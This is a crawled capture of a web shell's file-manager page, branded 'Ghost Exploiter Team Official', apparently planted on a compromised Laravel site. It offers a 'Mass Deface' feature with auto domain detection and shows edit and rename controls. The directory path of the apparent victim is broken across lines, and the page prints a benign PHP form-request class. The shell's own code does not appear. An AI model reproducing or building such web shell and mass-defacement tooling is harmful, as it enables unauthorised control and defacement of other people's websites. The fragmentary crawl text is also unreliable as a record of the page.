webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
listing.aminikamanpower.com
/
app
/
Http
/
Requests
/
Admin
/
Location
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
StoreLocation.php
0.763KB
edt
ren
UpdateLocation.php
0.584KB
edt
ren
error_log
9.064KB
edt
ren
<?php namespace App\Http\Requests\Admin\Location; use Illuminate\Foundation\Http\FormRequest; class UpdateLocation extends FormRequest { /** * Determine if the user is authorized to make this request. * * @return bool */ public function authorize() { return true; } /** * Get the validation rules that apply to the request. * * @return array */ public function rules() { return [ 'location' => 'required', 'zone' => 'required', 'country_id' => 'required' ]; } }
<=Back
Liking